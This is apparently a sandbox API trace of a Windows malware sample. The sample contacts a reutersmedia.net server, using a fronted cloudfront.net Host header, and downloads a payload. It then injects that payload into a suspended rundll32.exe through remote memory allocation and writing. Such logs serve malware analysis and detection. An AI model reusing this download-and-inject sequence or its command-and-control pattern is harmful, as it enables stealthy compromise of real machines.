[0498.036] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0498.036] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2cf9c0, dwBufferLength=0x4) returned 1
[0498.036] InternetConnectA (hInternet=0xcc0004, lpszServerName="www.reutersmedia.net", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008
[0498.037] GetLastError () returned 0x0
[0498.037] SetLastError (dwErrCode=0x0)
[0498.037] htonl (hostlong=0xa000000) returned 0xa
[0498.037] htonl (hostlong=0x22000000) returned 0x22
[0498.037] GetLastError () returned 0x0
[0498.037] SetLastError (dwErrCode=0x0)
[0498.037] htonl (hostlong=0xa000000) returned 0xa
[0498.037] htonl (hostlong=0x47000000) returned 0x47
[0498.037] GetLastError () returned 0x0
[0498.037] SetLastError (dwErrCode=0x0)
[0498.037] htonl (hostlong=0xa000000) returned 0xa
[0498.037] htonl (hostlong=0x1f000000) returned 0x1f
[0498.037] GetLastError () returned 0x0
[0498.037] SetLastError (dwErrCode=0x0)
[0498.037] htonl (hostlong=0x7000000) returned 0x7
[0498.037] htonl (hostlong=0x0) returned 0x0
[0498.037] htonl (hostlong=0x8000000) returned 0x8
[0498.037] htonl (hostlong=0x2000000) returned 0x2
[0498.037] htonl (hostlong=0x8000000) returned 0x8
[0498.037] htonl (hostlong=0x6000000) returned 0x6
[0498.037] htonl (hostlong=0x6000000) returned 0x6
[0498.037] GetLastError () returned 0x0
[0498.037] SetLastError (dwErrCode=0x0)
[0498.037] htonl (hostlong=0x0) returned 0x0
[0498.037] GetLastError () returned 0x0
[0498.037] SetLastError (dwErrCode=0x0)
[0498.037] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/safebrowsing/rd/ij34Feg034rf4-p34", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ce870*="*/*", dwFlags=0x84e83200, dwContext=0x0) returned 0xcc000c
[0498.037] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c | out: lpBuffer=0x2ce850, lpdwBufferLength=0x2ce84c) returned 1
[0498.037] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2ce850, dwBufferLength=0x4) returned 1
[0498.037] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Host: dl6zxn23r8r14.cloudfront.net\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nCookie: PREF=ID=ghndhbdppjjikglmaflidoaimmhflnpaeeaejlgnoonakahcfncncjdpphlbkefjjecbjnogghhfpidndmeccggmlpgdfajccmdokhgfhbpmcoofiabdhljmoapaaganmbboocpinhaejghhkghdmmobihfknbllhcjbdoldobkdlnfccipngkffnolldgoajbeopghdphobfjihhdannepdlicmhadfbhpoipdgmjiamallhpfbcjcofjhmipdm\r\n", dwHeadersLength=0x1a0, lpOptional=0x635d58*, dwOptionalLength=0x0 | out: lpOptional=0x635d58*) returned 1
[0498.726] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2cf8a8, lpdwBufferLength=0x2ce878, lpdwIndex=0x0 | out: lpBuffer=0x2cf8a8*, lpdwBufferLength=0x2ce878*=0x3, lpdwIndex=0x0) returned 1
[0498.726] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x2ce884, dwFlags=0x0, dwContext=0x0) returned 1
[0498.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65e8020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65e8020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65e9020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65e9020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65ea020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65ea020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65eb020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65eb020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.864] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65ec020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65ec020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.864] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65ed020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65ed020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.864] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65ee020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65ee020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.864] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65ef020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65ef020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f0020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f0020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f1020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f1020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0498.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f2020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f2020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f3020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f3020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f4020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f4020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f5020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f5020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.029] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f6020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f6020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.033] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f7020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f7020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.034] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f8020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f8020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.034] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65f9020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65f9020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.034] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65fa020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65fa020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65fb020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65fb020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65fc020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65fc020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65fd020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65fd020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65fe020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65fe020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x65ff020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x65ff020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.049] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6600020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6600020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6601020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6601020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6602020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6602020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6603020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6603020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.160] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6604020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6604020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.163] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6605020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6605020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.163] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6606020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6606020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.164] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6607020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6607020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.164] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6608020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6608020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.172] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x6609020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x6609020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660a020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660a020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660b020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660b020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660c020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660c020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660d020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660d020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660e020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660e020*, lpdwNumberOfBytesRead=0x2ce888*=0x1000) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660f020, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660f020*, lpdwNumberOfBytesRead=0x2ce888*=0xc60) returned 1
[0499.173] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x660fc80, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x2ce888 | out: lpBuffer=0x660fc80*, lpdwNumberOfBytesRead=0x2ce888*=0x0) returned 1
[0499.173] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0499.174] htonl (hostlong=0x4000000) returned 0x4
[0499.174] htonl (hostlong=0x0) returned 0x0
[0499.178] htonl (hostlong=0x4ed3855a) returned 0x5a85d34e
[0499.178] htonl (hostlong=0x427c0200) returned 0x27c42
[0499.178] htonl (hostlong=0x1000000) returned 0x1
[0499.178] htonl (hostlong=0x7c0200) returned 0x27c00
[0499.178] GetStartupInfoA (in: lpStartupInfo=0x2cf940 | out: lpStartupInfo=0x2cf940*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\explorer.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0499.178] GetCurrentProcess () returned 0xffffffff
[0499.178] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000
[0499.179] GetProcAddress (hModule=0x76bc0000, lpProcName="IsWow64Process") returned 0x76bd96e0
[0499.179] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf808 | out: Wow64Process=0x2cf808) returned 1
[0499.179] GetLastError () returned 0x0
[0499.179] SetLastError (dwErrCode=0x0)
[0499.179] ExpandEnvironmentStringsA (in: lpSrc="%windir%\\syswow64\\rundll32.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x22
[0499.179] ExpandEnvironmentStringsA (in: lpSrc="%windir%\\syswow64\\rundll32.exe", lpDst=0x2cf820, nSize=0x22 | out: lpDst="C:\\Windows\\syswow64\\rundll32.exe") returned 0x21
[0499.179] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\syswow64\\rundll32.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2cf940*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\explorer.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf988 | out: lpCommandLine="C:\\Windows\\syswow64\\rundll32.exe", lpProcessInformation=0x2cf988*(hProcess=0x340, hThread=0x680, dwProcessId=0xac4, dwThreadId=0x60c)) returned 1
[0499.404] OpenProcess (dwDesiredAccess=0x43a, bInheritHandle=0, dwProcessId=0xac4) returned 0x34c
[0499.404] Sleep (dwMilliseconds=0x64)
[0499.508] GetCurrentProcessId () returned 0xc84
[0499.508] VirtualAllocEx (hProcess=0x34c, lpAddress=0x0, dwSize=0x28000, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000
[0499.508] WriteProcessMemory (in: hProcess=0x34c, lpBaseAddress=0x1c0000, lpBuffer=0x65e8028*, nSize=0x27c00, lpNumberOfBytesWritten=0x2cf8f4 | out: lpBuffer=0x65e8028*, lpNumberOfBytesWritten=0x2cf8f4*=0x27c00) returned 1
[0499.511] VirtualProtectEx (in: hProcess=0x34c, lpAddress=0x1c0000, dwSize=0x28000, flNewProtect=0x20, lpflOldProtect=0x2cf8ec | out: lpflOldProtect=0x2cf8ec*=0x4) returned 1
[0499.511] GetCurrentProcess () returned 0xffffffff
[0499.512] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000
[0499.512] GetProcAddress (hModule=0x76bc0000, lpProcName="IsWow64Process") returned 0x76bd96e0
[0499.512] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf5e8 | out: Wow64Process=0x2cf5e8) returned 1
[0499.512] GetModuleHandleA (lpModuleName="kernel32") returned 0x76bc0000
[0499.512] GetProcAddress (hModule=0x76bc0000, lpProcName="IsWow64Process") returned 0x76bd96e0
[0499.512] IsWow64Process (in: hProcess=0x340, Wow64Process=0x2cf5e8 | out: Wow64Process=0x2cf5e8) returned 1
[0499.512] GetThreadContext (in: hThread=0x680, lpContext=0x2cf61c | out: lpContext=0x2cf61c*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7f66a000, Edx=0x0, Ecx=0x0, Eax=0x914600, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x86, [129]=0x57, [130]=0x2e, [131]=0xf4, [132]=0xf4, [133]=0xf7, [134]=0x2c, [135]=0x0, [136]=0x78, [137]=0x5f, [138]=0x60, [139]=0x0, [140]=0x20, [141]=0xf8, [142]=0x2c, [143]=0x0, [144]=0x20, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x88, [149]=0xf9, [150]=0x2c, [151]=0x0, [152]=0x4, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x1, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x40, [161]=0xf9, [162]=0x2c, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x20, [169]=0xf8, [170]=0x2c, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x28, [269]=0xf9, [270]=0x2c, [271]=0x0, [272]=0x81, [273]=0x5b, [274]=0x60, [275]=0x0, [276]=0x20, [277]=0xf8, [278]=0x2c, [279]=0x0, [280]=0x20, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x40, [285]=0xf9, [286]=0x2c, [287]=0x0, [288]=0x88, [289]=0xf9, [290]=0x2c, [291]=0x0, [292]=0x4, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x1, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x8f, [305]=0x5b, [306]=0x60, [307]=0x0, [308]=0x88, [309]=0xf9, [310]=0x2c, [311]=0x0, [312]=0x43, [313]=0x3a, [314]=0x5c, [315]=0x57, [316]=0x69, [317]=0x6e, [318]=0x64, [319]=0x6f, [320]=0x77, [321]=0x73, [322]=0x5c, [323]=0x73, [324]=0x79, [325]=0x73, [326]=0x77, [327]=0x6f, [328]=0x77, [329]=0x36, [330]=0x34, [331]=0x5c, [332]=0x72, [333]=0x75, [334]=0x6e, [335]=0x64, [336]=0x6c, [337]=0x6c, [338]=0x33, [339]=0x32, [340]=0x2e, [341]=0x65, [342]=0x78, [343]=0x65, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x4c, [413]=0x8d, [414]=0x1f, [415]=0x77, [416]=0x8c, [417]=0x8f, [418]=0x1f, [419]=0x77, [420]=0xf6, [421]=0x53, [422]=0xfe, [423]=0x75, [424]=0x7c, [425]=0x99, [426]=0x1f, [427]=0x77, [428]=0xa, [429]=0x54, [430]=0xfe, [431]=0x75, [432]=0x4c, [433]=0x3, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x1c, [439]=0x0, [440]=0x0, [441]=0x7c, [442]=0x2, [443]=0x0, [444]=0xec, [445]=0x90, [446]=0x1f, [447]=0x77, [448]=0x5d, [449]=0x11, [450]=0x5, [451]=0x76, [452]=0x4c, [453]=0x3, [454]=0x0, [455]=0x0, [456]=0xd0, [457]=0xf8, [458]=0x2c, [459]=0x0, [460]=0xd4, [461]=0xf8, [462]=0x2c, [463]=0x0, [464]=0x20, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0xec, [469]=0xf8, [470]=0x2c, [471]=0x0, [472]=0x0, [473]=0x7c, [474]=0x2, [475]=0x0, [476]=0xf8, [477]=0xf8, [478]=0x2c, [479]=0x0, [480]=0xa8, [481]=0x58, [482]=0x60, [483]=0x0, [484]=0x4c, [485]=0x3, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x1c, [491]=0x0, [492]=0x0, [493]=0x80, [494]=0x2, [495]=0x0, [496]=0x20, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0xec, [501]=0xf8, [502]=0x2c, [503]=0x0, [504]=0x4c, [505]=0x3, [506]=0x0, [507]=0x0, [508]=0x88, [509]=0xf9, [510]=0x2c, [511]=0x0))) returned 1
